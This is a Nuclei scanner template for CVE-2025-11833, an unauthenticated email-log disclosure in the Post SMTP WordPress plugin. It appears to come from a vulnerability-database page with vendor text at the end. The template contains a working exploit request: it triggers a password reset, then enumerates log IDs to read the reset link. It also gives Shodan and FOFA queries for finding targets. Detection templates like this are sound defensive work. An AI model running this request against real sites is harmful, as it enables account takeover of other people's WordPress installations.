id: CVE-2025-11833
info:
name: Post SMTP <= 3.6.0 - Email Log Disclosure
author: Kazgangap
severity: critical
description: |
Post SMTP WordPress plugin <= 3.6.0 contains an unauthorized data access vulnerability caused by missing capability check in __construct function, letting unauthenticated attackers read arbitrary logged emails, exploit requires no authentication.
impact: |
Unauthenticated attackers can read sensitive logged emails, including password reset links, potentially leading to account takeover.
remediation: |
Update to the latest version beyond 3.6.0
reference:
- https://github.com/Kazgangap/cve-poc-garage/blob/main/2025/CVE-2025-11833.md
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/post-smtp/post-smtp-complete-smtp-solution-with-logs-alerts-backup-smtp-mobile-app-360-missing-authorization-to-account-takeover-via-unauthenticated-email-log-disclosure
- https://nvd.nist.gov/vuln/detail/CVE-2025-11833
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-11833
epss-score: 0.51507
epss-percentile: 0.98811
cwe-id: CWE-862
cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 1
vendor: wpexperts
product: post_smtp_mailer
framework: wordpress
shodan-query: http.html:/wp-content/plugins/post-smtp
fofa-query: body=/wp-content/plugins/post-smtp
tags: cve,cve2025,wp,wp-plugin,wordpress,post-smtp,exposure,vkev,fuzz
variables:
username: "{{username}}"
http:
- raw:
- |
POST /wp-login.php?action=lostpassword&page=postman_email_log&view=log&log_id={{log_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
user_login={{username}}&redirect_to=&wp-submit=Get+New+Password
payloads:
log_id: helpers/wordlists/numbers.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains_all(body, "your password, visit the following address:", "key=", "Username: {{username}}")'
condition: and
# digest: 4a0a00473045022100c5a25de1add40e8bd4892aae9335cc9c27106f03801394e88ffb1c52decee4ec02207a1a270d25f3ad58e310da23402e4abcb1bb6e5a2deebf8ca556ca3e31a249eb:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation